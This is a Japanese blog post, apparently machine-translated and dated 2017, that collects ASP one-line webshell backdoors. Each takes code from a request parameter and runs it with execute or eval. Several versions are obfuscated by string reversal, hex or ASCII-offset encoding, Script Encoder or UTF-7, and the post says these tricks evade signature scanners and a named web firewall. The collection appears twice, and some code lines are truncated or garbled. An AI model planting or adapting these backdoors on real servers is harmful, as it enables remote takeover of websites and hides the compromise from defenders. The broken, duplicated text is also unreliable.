一言木馬:ASP編
2846 ワード
一言木馬:ASP編
ASP一言木馬収集:
""then session("c")=request("c"):end if:if session("c")<>""then execute session("c")%>
""then ExecuteGlobal request("c") end if %>
< %'
eval(request("c"))
execute request("#")
UTF-7符号化暗号化:
Script Encoder暗号化//パスワードc
このコードは「eval request(/*/z/*/)」を「)/*/z/*/(tseuqer lave」に逆シーケンスして特徴コードの検出を回避し、スクリプトがアクセスされると、そのコードは動的に復号されて元の一言のバックドアに復元される.現在、90%以上の未知のバックドアと変形バックドアは、このような動的復号技術を用いている
Function MorfiCoder(Code)MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)End FunctionExecute MorfiCoder(")/*/z/*/(tseuqer lave")%>
パスワードz
雷客図の一言木馬を避けることができます.
ms.Language="VBScript"ms.AddObject "Response", Responsems.AddObject "request", requestms.AddObject "session", sessionms.AddObject "server", serverms.AddObject "application", applicationms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
password=Request("class")Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function%>
password=Request("class")Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function%>
犬に一言:
参考資料:
一般的なwebshellバックドアの特徴コードhttps://zhuanlan.zhihu.com/p/22149072
一言の裏口の収集と整理についてhttp://book.51cto.com/art/201204/328741.htm
asp実行cmdインスタンスhttp://m.blog.csdn.net/woswod/article/details/63253494
posted @
2017-09-20 13:08 Bypass読解(
...) コメント(
...) コレクションの編集
ASP一言木馬収集:
""then session("c")=request("c"):end if:if session("c")<>""then execute session("c")%>
""then ExecuteGlobal request("c") end if %>
< %'
eval(request("c"))
execute request("#")
UTF-7符号化暗号化:
Script Encoder暗号化//パスワードc
このコードは「eval request(/*/z/*/)」を「)/*/z/*/(tseuqer lave」に逆シーケンスして特徴コードの検出を回避し、スクリプトがアクセスされると、そのコードは動的に復号されて元の一言のバックドアに復元される.現在、90%以上の未知のバックドアと変形バックドアは、このような動的復号技術を用いている
Function MorfiCoder(Code)MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)End FunctionExecute MorfiCoder(")/*/z/*/(tseuqer lave")%>
パスワードz
雷客図の一言木馬を避けることができます.
ms.Language="VBScript"ms.AddObject "Response", Responsems.AddObject "request", requestms.AddObject "session", sessionms.AddObject "server", serverms.AddObject "application", applicationms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
password=Request("class")Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function%>
password=Request("class")Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function%>
犬に一言:
dim play
'
'
''''''''''''''''''
'''''''''
play = request("#")
%>
Error
execute(play)
%>65000%>
936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>参考資料:
一般的なwebshellバックドアの特徴コードhttps://zhuanlan.zhihu.com/p/22149072
一言の裏口の収集と整理についてhttp://book.51cto.com/art/201204/328741.htm
asp実行cmdインスタンスhttp://m.blog.csdn.net/woswod/article/details/63253494
posted @
2017-09-20 13:08 Bypass読解(
...) コメント(
...) コレクションの編集